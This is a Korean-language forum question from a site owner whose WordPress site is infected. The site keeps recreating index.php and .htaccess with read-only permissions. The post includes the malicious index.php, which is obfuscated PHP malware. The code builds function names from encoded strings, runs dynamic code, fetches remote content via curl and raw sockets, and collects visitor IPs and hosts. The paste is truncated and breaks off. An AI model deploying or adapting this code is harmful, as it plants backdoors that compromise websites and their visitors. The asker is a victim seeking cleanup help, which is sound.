WordPress는 계속해서 index.php 및 .htaccess 파일을 만들고 사용 권한을 0444로 변경합니다.
악성코드에 감염된 웹 사이트를 수정해야 합니다. WP 관리자에게 접속하려고 하면 "to many redirects"라고 표시됩니다.
호스팅 회사가 스캔을 했는데 감염된 파일이 많았어요. public_html 폴더의 index.php를 제외한 모든 파일을 삭제했습니다. index.php 내의 코드는 다음과 같습니다.
<?php
$O0_O00_OO_='xaoH6Rs0zcxDeo5viLrz8MgweN9D5k9tmY225gw0sLaX9Yk0aLkm3dop7Z2XnJjxjdeWyV7lib1ik5sjmbh2c01=';
$O0OOO0_0__=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$OO_O_0O_00=$O0OOO0_0__{16}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{27}.$O0OOO0_0__{29}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{16}.$O0OOO0_0__{23}.$O0OOO0_0__{6}.$O0OOO0_0__{32}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{6}.$O0OOO0_0__{23}.$O0OOO0_0__{23}.$O0OOO0_0__{3}.$O0OOO0_0__{6}.$O0OOO0_0__{32}.$O0OOO0_0__{25};$OO0OO__00_=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{23}.$O0OOO0_0__{12}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10};$O0_O__0OO0=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{5}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{6}.$O0OOO0_0__{29}.$O0OOO0_0__{26}.$O0OOO0_0__{6}.$O0OOO0_0__{10}.$O0OOO0_0__{6};$O_O_00OO_0=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{3}.$O0OOO0_0__{23}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{12}.$O0OOO0_0__{0}.$O0OOO0_0__{27};$OO_000O__O=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{5}.$O0OOO0_0__{30}.$O0OOO0_0__{35}.$O0OOO0_0__{18}.$O0OOO0_0__{10};$O0O__O0_O0=$O0OOO0_0__{38}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{16}.$O0OOO0_0__{18}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0_
_{10}.$O0OOO0_0__{33};$O_OO_000_O=$O0OOO0_0__{38}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$O00_O__O0O=$O0OOO0_0__{31}.$O0OOO0_0__{10}.$O0OOO0_0__{10}.$O0OOO0_0__{16}.$O0OOO0_0__{29}.$O0OOO0_0__{3}.$O0OOO0_0__{18}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{26}.$O0OOO0_0__{29}.$O0OOO0_0__{19}.$O0OOO0_0__{18}.$O0OOO0_0__{30}.$O0OOO0_0__{24}.$O0OOO0_0__{20};$O0OO0_0_O_=$O0OOO0_0__{38}.$O0OOO0_0__{18}.$O0OOO0_0__{0}.$O0OOO0_0__{32}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{29}.$O0OOO0_0__{30}.$O0OOO0_0__{17}.$O0OOO0_0__{12}.$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$OO_0O_O_00=$O0OOO0_0__{32}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{38}.$O0OOO0_0__{18}.$O0OOO0_0__{0}.$O0OOO0_0__{32}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{35}.$O0OOO0_0__{0};$O00O0___OO=$O0OOO0_0__{33}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{0}.$O0OOO0_0__{30}.$O0OOO0_0__{32}.$O0OOO0_0__{10};$OO00_O0__O=$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{
///SOME CODE IS MISSING BECAUSE OF 30K LIMIT
0OOO0_0__{26};$OO000O__O_=$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{12}.$O0OOO0_0__{5};$OOO0_0O0__=$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{5}.$O0OOO0_0__{30};$O_0OO0_O0_=$O0OOO0_0__{41}.$O0OOO0_0__{35}.$O0OOO0_0__{12}.$O0OOO0_0__{0};$O0_OOO00__=$O0OOO0_0__{38}.$O0OOO0_0__{30}.$O0OOO0_0__{35}.$O0OOO0_0__{38};$OOO_000O__=$O0OOO0_0__{5}.$O0OOO0_0__{26}.$O0OOO0_0__{7};if(!function_exists('str_ireplace')){function str_ireplace($from,$to,$string){return trim(preg_replace("/".addcslashes($from,"?:\\/*^$")."/si",$to,$string));}};$O_0__O0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$url,$OO0OO0_0__=0,$O_0_00_OOO=1,$O_0OO0O__0=NULL,$OO0_O0O__0=array(),$O_O0O0__0O=\'shell\'','if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x4f\x5f\x30\x30"]("/^https*\\:\\/\\//si",$url)){if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x72\x72"])){$O_OO00O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'iy4tyhTkktKsovilXIzCtLzMlMUQCKWKnlJRUtPXWAMA\');$O_OO00O0__.=$url;echo $O_OO00O0__;unset($O_OO00O0__);exit();}return \'\';}$OO0_0_0O_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Sy4tyhTonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBtPSJakA\');$OO_00OO_0_=$O_O__00O0O=\'\';foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"](\'|\',$OO0_0_0O_O) as $c){$OO00OO___0=1;if($OO0OO0_0__&&substr($c,0,1)==\'c\'){continue;}foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"](\'+\',$c) as $d){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x4f\x5f"]($d)){$OO00OO___0=0;}}unset($d);if($OO00OO___0){$OO_00OO_0_=$c;break;}}unset($OO0_0_0O_O,$c);if($OO_00OO_0_==\'\'){return 
0;}if(substr($OO_00OO_0_,0,1)==\'c\'){$O0O___0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x5f\x30\x30\x4f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_USERAGENT,$O_O0O0__0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_TIMEOUT,100);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_FRESH_CONNECT,TRUE);if($O_0_00_OOO==2){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_POST,1);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O_0OO0O__0)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_POSTFIELDS,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x5f\x4f\x30\x4f"]($O_0OO0O__0));}}$O_0O__O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f\x5f"]($O0O___0OO0);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x4f\x30\x4f\x5f\x5f"]($O0O___0OO0);if(!$O_0O__O00O){if(isset(${"\x5f\x47\x45\x54"}["\x63\x75\x72\x6c\x65\x72\x72"])){$O_OO00O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'i04uLhTcpRSC0qyi+KVctLKi6tPwBgA=\');$O_OO00O0__.=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x30\x5f\x5f\x4f\x30"]($O0O___0OO0);echo $O_OO00O0__;unset($O_OO00O0__);exit();}return 0;}else{$O_0O__O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"]($O_0O__O00O,"\\xEF\\xBB\\xBF"));return 
$O_0O__O00O;}}$O0_O_0_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x30\x4f\x5f\x4f"]($url);isset($O0_O_0_O0O["\x68\x6f\x73\x74"])||$O0_O_0_O0O["\x68\x6f\x73\x74"]=\'\';isset($O0_O_0_O0O["\x70\x61\x74\x68"])||$O0_O_0_O0O["\x70\x61\x74\x68"]=\'\';isset($O0_O_0_O0O["\x71\x75\x65\x72\x79"])|| $O0_O_0_O0O["\x71\x75\x65\x72\x79"]=\'\';isset($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])||$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"]=\'\';$O__OOO00_0=$O0_O_0_O0O["\x70\x61\x74\x68"]?$O0_O_0_O0O["\x70\x61\x74\x68"].($O0_O_0_O0O["\x71\x75\x65\x72\x79"]?\'?\'.$O0_O_0_O0O["\x71\x75\x65\x72\x79"]:\'\'):\'/\';$OOO00O0___=$O0_O_0_O0O["\x68\x6f\x73\x74"];if($O0_O_0_O0O["\x73\x63\x68\x65\x6d\x65"]==\'https\'){$O00_OO__0O=\'1.1\';$O0O0__O_0O=empty($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])?443:$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"];$OOO00O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Ky7OshTdLtPXBwA=\');$OOO00O0___.=$O0_O_0_O0O["\x68\x6f\x73\x74"];}else{$O00_OO__0O=\'1.0\';$O0O0__O_0O=empty($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])?80:$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"];}$O0OO_0O0__=\'Host:\';$O0OO_0O0__.=$OOO00O0___;$OO0_O0O__0[]=$O0OO_0O0__;$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PyhT0tNLsnMz7NyzsktPvTgUA\');$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Cy1OLhTdJ1TE/NK7EtPCAA==\').$O_O0O0__0O;$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c0xOThTi0osdLtPS1wIA\');unset($O0OO_0O0__);if($O_0_00_OOO==2){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O_0OO0O__0)){$O_0OO0O__0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x5f\x4f\x30\x4f"]($O_0OO0O__0);}$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87P
KhT0nNK9EtqSxItUosKMjJTE4syczP06/QLS8v103LL8rVLS3KSc1Lzk9tPJTQEA\');$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PKhT0nNK9H1Sc1LL8mtPwAgA=\').${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_0OO0O__0);$O_O__00O0O="POST $O__OOO00_0 HTTP/$O00_OO__0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30\x5f"]("\\r\\n",$OO0_O0O__0)."\\r\\n\\r\\n".$O_0OO0O__0;unset($O_0OO0O__0);}else{$O_O__00O0O="GET $O__OOO00_0 HTTP/$O00_OO__0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30\x5f"]("\\r\\n",$OO0_O0O__0)."\\r\\n\\r\\n";}unset($OO0_O0O__0,$O0_O_0_O0O,$O00_OO__0O,$O__OOO00_0);$O_O0O__0O0=null;if(substr($OO_00OO_0_,-1)==\'n\'){$O_O0O__0O0=$OO_00OO_0_($OOO00O0___,$O0O0__O_0O,$O_OO00O0__no,$O_OO00O0__str,30);}else{if(substr($OO_00OO_0_,-1)==\'t\'){$O_O__O0O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'K0kushTNLtPXBwA=\');$O_O__O0O00.=$OOO00O0___;$O_O__O0O00.=\':\';$O_O__O0O00.=$O0O0__O_0O;$O_O0O__0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x4f\x5f\x5f\x30\x30\x5f"]($O_O__O0O00,$O_OO00O0__no,$O_OO00O0__str,30);unset($O_O__O0O00);}}$O_OO00__0O=\'\';if($O_O0O__0O0){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x4f\x4f\x5f\x30"]($O_O0O__0O0,true);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x30\x30\x4f\x5f\x5f\x4f"]($O_O0O__0O0,30);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O0O__0O0,$O_O__00O0O);if(!$OO0OO0_0__){$O_0_O00_OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x5f\x30\x4f\x4f\x30"]($O_O0O__0O0);if(!$O_0_O00_OO["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x30\x5f\x5f"]($O_O0O__0O0)){$O_0O0OO_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x30\x4f\x4f\x4f\x5f\x5f"]($O_O0O__0O0);if($O_0O0OO_0_&&($O_0O0OO_0_=="\\r\\n"||$O_0O0OO_0_=="\\n")){break;}uns
et($O_0O0OO_0_);}while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x30\x5f\x5f"]($O_O0O__0O0)){$O_O_0O00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x4f\x5f\x5f\x30\x4f\x5f"]($O_O0O__0O0,8192);$O_OO00__0O.=$O_O_0O00_O;unset($O_O_0O00_O);}}unset($O_0_O00_OO);}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x4f\x4f\x30\x5f"]($O_O0O__0O0);}else{if(substr($OO_00OO_0_,-1)==\'e\'){$O0O_0O0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x5f\x4f\x30\x5f\x5f\x4f"]($OOO00O0___);$O_O0O__0O0=$OO_00OO_0_(AF_INET,SOCK_STREAM,0);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x30\x5f\x5f\x5f\x4f\x4f"]($O_O0O__0O0,$O0O_0O0_O_,$O0O0__O_0O)){if(!$OO0OO0_0__){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]($O_O0O__0O0,$O_O__00O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O__00O0O));while($O0O0O0O___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x30\x30\x4f\x4f"]($O_O0O__0O0,8192)){$O_OO00__0O.=$O0O0O0O___;unset($O0O0O0O___);}$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"]("\\r\\n\\r\\n",$O_OO00__0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x4f\x4f\x30\x4f\x30"]($O_OO00__0O);$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30\x4f\x30"]("\\r\\n\\r\\n",$O_OO00__0O);}else{$O_O_00_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30"](2,5);$O_00OO0O__=0;while($O_00OO0O__<$O_O_00_O0O){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]($O_O0O__0O0,$O_O__00O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O__00O0O));$O_00OO0O__++;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x4f\x5f\x5f\x4f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30"](50000,100000));}unset($O_00OO0O__,$O_O_00_O0O);}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\
x5f\x30\x30\x4f\x4f\x5f"]($O_O0O__0O0);unset($O0O_0O0_O_);}}unset($O_O__00O0O,$OO_00OO_0_,$O_O0O__0O0,$O0O0__O_0O,$OOO00O0___);if(!$OO0OO0_0__){$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x30"](\'/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)\'.\'((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"](\'$matches\',\'return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x30\x5f\x5f\x4f\x4f\x4f"]($matches[1])==${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($matches[2])?$matches[2]:$matches[0];\'),$O_OO00__0O);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"]($O_OO00__0O,"\\xEF\\xBB\\xBF"));}else{return 1;}');$OOO__000_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0','$O_O_0OO0_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x30\x30\x5f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x30\x4f\x30\x5f\x5f"]($OOO0__0O_0));$OO__O0O_00=substr($O_O_0OO0_0,0,5);$OOO_00__0O=substr($O_O_0OO0_0,-5);$OO__0O0_O0=substr($O_O_0OO0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O_0OO0_0)-10);return $OO__O0O_00.\'hT\'.substr($O_O_0OO0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O_0OO0_0)-10).\'tP\'.$OOO_00__0O;');$O0_0_OO0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0','$OO__O0O_00=substr($OOO0__0O_0,0,5);$OOO_00__0O=substr($OOO0__0O_0,-5);$OO__0O0_O0=substr($OOO0__0O_0,7,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($OOO0__0O_0)-14);return 
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($OO__O0O_00.$OO__0O0_O0.$OOO_00__0O));');$OO_0O0_0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OO_OO0__00=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"})){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"])){$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"];}else if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"])){$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"];}else{$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];}}else{if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_X_FORWARDED_FOR\')){$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_X_FORWARDED_FOR\');}else if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_CLIENT_IP\')){$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_CLIENT_IP\');}else{$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'REMOTE_ADDR\');}}return $OO_OO0__00;');$O0_O_O_O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return 
$OOO0__0O_0;');$O_O0O_00O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O0_O00_OO_','$O__OO00_0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x4f\x4f\x30\x5f\x30"]($O0_O00_OO_);$OO0_0__0OO=\'\';for ($O_00OO0O__=0;$O_00OO0O__<${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O__OO00_0O);$O_00OO0O__++){if($O_00OO0O__%2!=0){$OO0_0__0OO.=$O__OO00_0O[$O_00OO0O__];}}return 